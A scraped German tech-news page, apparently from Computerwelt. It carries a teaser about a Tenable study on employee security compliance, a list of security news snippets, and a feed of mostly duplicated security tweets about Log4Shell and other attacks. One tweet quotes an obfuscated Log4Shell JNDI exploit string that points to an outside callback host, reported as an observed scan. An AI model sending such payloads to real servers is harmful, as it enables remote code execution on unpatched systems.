Computerwelt Logo
Mitarbeiter in Unternehmen der mittelgroßen Gruppe fühlen sich seltener für die Sicherheit der Geräte verantwortlich, die sie für ihre Arbeit nutzen. (c) Unsplash

Mitarbeiter größerer Unternehmen halten sich am seltensten an die Richtlinien für WLAN- und Passwort-Sicherheit

Die Sicherheit eines Unternehmens liegt oft in den Händen der Mitarbeiter, die tagtäglich auf dessen Daten zugreifen. Neue Erkenntnisse liefert hierzu eine globale Studie, die von Tenable in Auftrag gegeben und von Forrester Consulting durchgeführt wurde.

Werbung

Zühlke_Sustainable Software Solutions
ZUKUNFTSFIT MIT EDI – SELBSTVERSTÄNDLICH NACHHALTIG!

ZUKUNFTSFIT MIT EDI – SELBSTVERSTÄNDLICH NACHHALTIG!

Im Jahr 2019 wurden weltweit rund 550 Milliarden Rechnungen erstellt – davon allerdings erst rund zehn Prozent komplett papierlos, wie aus der Billentis-Studie hervorgeht. [...]

Tägliche Meldungen zu Security

Gravierende Sicherheitslücke in Java-Software gefährdet das halbe Internet

Eine Sicherheitslücke macht das halbe Internet unsicher. Ein Zero-Day-Exploit, der eine Schwachstelle in der Java-Software Log4j ausnutzt, macht zahlreiche Server und Apps angreifbar. Cybersecurity-Teams weltweit warnen.

Die ICT-Evolution der zwei Geschwindigkeiten

Auch im Gesundheitswesen liegt die digitale Zukunft in der Cloud. Doch der Weg dahin ist anspruchsvoll. Das hat nur teilweise mit den hohen Sicherheitsanforderungen oder dem Datenschutz zu tun. Mindestens so komplex ist das Zusammenführen von Anwendungen aus verschiedenen Technologie-Generationen. Ein wichtiger Schlüssel zur Lösung dürfte dabei

So hält man Cyberstalker fern

«Cyberstalking» stellt für die Online-Privatsphäre eines jeden Internetnutzers ein ernstzunehmendes Problem dar. Den Unterschied zu «Social Media Stalking» und die besten Schutzmechanismen erklärt Norton™.

App Security: von Grund auf mitgedacht

Apps sind Zielscheibe von immer mehr und immer ausgefeilteren Angriffen. Dennoch wird dem Thema Security in der App-Entwicklung nach wie vor zu wenig Bedeutung beigemessen.

Very Peri: Neues Windows-Theme feiert Pantone-Farbe des Jahres 2022

Very Peri heißt die "Pantone-Farbe des Jahres 2022". Windows-Nutzer können den Trend jetzt mitmachen, denn Microsoft stellt gleich mehrere Hintergrundbilder und Themes in der neuen Trendfarbe Perlblau zur Verfügung. (Weiter lesen)

Sicherheitslücken bei Smart Home & IoT: Hersteller arbeiten "inakzeptabel"

Laut IoT Security Foundation reagieren fast 80 Prozent aller Firmen, die IoT-Geräte verkaufen, gar nicht oder unzureichend auf gemeldete Sicherheitsmängel.

Warnung vor kritischer Sicherheitslücke in Log4j

IT-Sicherheitsexperten schlagen Alarm wegen einer Schwachstelle, die auf breiter Front Server im Netz bedroht. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) setzte am Samstag seine Warnstufe zu der Sicherheitslücke von Orange auf Rot hoch. Es gebe weltweit Angriffsversuche, die zum Teil erfolgreich gewesen seien, hieß es zur Begr

CrowdStrike-Umfrage: Vertrauen in IT-Konzerne wie Microsoft sinkt

Eine vor kurzem durchgeführte Umfrage zeigt, dass immer mehr Nutzer das Vertrauen in IT-Unternehmen wie Microsoft verlieren. Für das gesunkene Vertrauen sollen von Ransomware ausgenutzte Schwachstellen verantwortlich sein. Viele Konzerne reagieren erst spät auf Bedrohungen. (Weiter lesen)

Sicherheits-Patch Dezember: Wichtige Updates für Chrome und Edge

Es gibt neue Sicherheitsupdates für Google Chrome und für Microsoft Edge. Die Updates werden allen Nutzern empfohlen, da es mehrere teils als hoch riskant eingestufte Schwachstellen behebt. Die Updates sind bereits im WinFuture Download-Bereich verfügbar. (Weiter lesen)

FinFisher: Der deutsche Staatstrojaner-Hersteller ist pleite

Der Münchener Malware-Hersteller FinFisher ist pleite. Wie jetzt bekannt wurde, ist bereits in der letzten Woche ein Insolvenzverwalter bestellt worden, der die Geldabflüsse aus der Firma unter seine Kontrolle stellt. (Weiter lesen)

Vorsicht: Manipulierter Installer für Notepad++ verteilt Malware

Es gibt eine neue Warnung vor gefälschten, manipulierten Installern beliebter Windows-Software. Wie jetzt bekannt wurde, verwendet die Hackergruppe StrongPity nun Notepad++, um Malware zu verbreiten. Zuvor hatten sie schon Fake-WinRAR-Software "angeboten". (Weiter lesen)

Google kämpft gegen Blockchain-Botnet

Die Cybersecurity-Teams von Google haben mehrere Massnahmen ergriffen, um das Glupteba-Botnet vorübergehend lahmzulegen. Das Botnet ist jedoch dank seiner Blockhain-Architektur sehr widerstandsfähig.

Swiss Cyber Security Days gehen in die fünfte Dimension

Die nächste Ausgabe der Swiss Cyber Security Days findet am 6. und 7. April 2021 statt. Sie steht diesmal ganz im Zeichen des Metaversums und seinem Einfluss auf die Gesellschaft.

Das prägt die Cybersicherheit 2022

Die Pandemie ist noch nicht vorbei, Remote Work wird bleiben und die Anzahl der IoT-Geräte wächst immer weiter. Diese und weitere Faktoren schaffen eine komplexe Situation und diffuse Bedrohungslage. Um zu verhindern, dass Hacker diese ausnutzen, müssen Unternehmen technologisch aufrüsten. Drei Experten von Micro Focus schätzen ein, welche Ent

FritzOS 7.39: AVM plant WireGuard VPN-Integration für FritzBoxen

Aus internen Firmware-Versionen des kommenden FritzOS 7.39 geht hervor, dass AVM an einer Integration des WireGuard-Protokolls für die VPN-Nutzung auf FritzBox-Routern arbeitet. Der Vorteil gegenüber der klassischen AVM-Lösung liegt vor allem in einer höheren Geschwindigkeit. (Weiter lesen)

6e5322d343
Security Tweets

Several hackers are actively weaponizing unpatched servers affected by the recently disclosed "#Log4Shell" #vulnerability in Apache $Log4j to install #cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet. Details: thehackernews.com

Several hackers are actively weaponizing unpatched servers affected by the recently disclosed "#Log4Shell" #vulnerability in Apache $Log4j to install #cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet. Details: thehackernew

intermingled with the flood of requests from BinaryEdge, there are now some RMI and even DNS attempts to exploit #log4shell #scanworld pic.twitter.com/baQB5cwnUu

intermingled with the flood of requests from BinaryEdge, there are now some RMI and even DNS attempts to exploit #log4shell #scanworld pic.twitter.com/baQB5cwnUu

Check out the new free ebook from the experts at @RecordedFuture: ""Ransomware: Understand. Prevent. Record. How you can stop a ransomware attack in its tracks." grahamcluley.com/go/recordedfut… Thanks to Recorded Future for sponsoring my site this week

Check out the new free ebook from the experts at @RecordedFuture: ""Ransomware: Understand. Prevent. Record. How you can stop a ransomware attack in its tracks." grahamcluley.com/go/recordedfut… Thanks to Recorded Future for sponsoring my site th

Massive wave of attacks being aimed at WordPress websites bleepingcomputer.com/news/security/…

Massive wave of attacks being aimed at WordPress websites bleepingcomputer.com/news/security/…

Read our blog on Apache Log4j Zero-Day. Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability. symantec-enterprise-blogs.security.com/blogs/threat-i… #Log4Shell

Read our blog on Apache Log4j Zero-Day. Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability. symantec-enterprise-blogs.security.com/blogs/threat-i… #Log4Shell

Seeing now #log4shell exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans) pic.twitter.com/r

Seeing now #log4shell exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans) pic.twitter.

Read our blog on Apache Log4j Zero-Day. Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability. symantec-enterprise-blogs.security.com/blogs/threat-i… #log4j #Log4Shell pic.twitter.com/TyLQ7w3NV7

Read our blog on Apache Log4j Zero-Day. Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability. symantec-enterprise-blogs.security.com/blogs/threat-i… #log4j #Log4Shell pic.twitter.com/TyLQ7w3NV7

TP-Link routers under attack from Dark Mirai botnet bleepingcomputer.com/news/security/…

TP-Link routers under attack from Dark Mirai botnet bleepingcomputer.com/news/security/…

⚡ #Log4Shell / CVE-2021-44228 / CVSS 10 A new highly critical RCE #vulnerability in the Java-based #Log4J logging library affects a large number of applications and services on the Internet. Details — thehackernews.com/2021/12/extrem… #infosec #cyberse

⚡ #Log4Shell / CVE-2021-44228 / CVSS 10 A new highly critical RCE #vulnerability in the Java-based #Log4J logging library affects a large number of applications and services on the Internet. Details — thehackernews.com/2021/12/extrem… #infos

Massive attack against 1.6 million WordPress sites underway bleepingcomputer.com/news/security/…

Massive attack against 1.6 million WordPress sites underway bleepingcomputer.com/news/security/…




facebook twitter linkedin email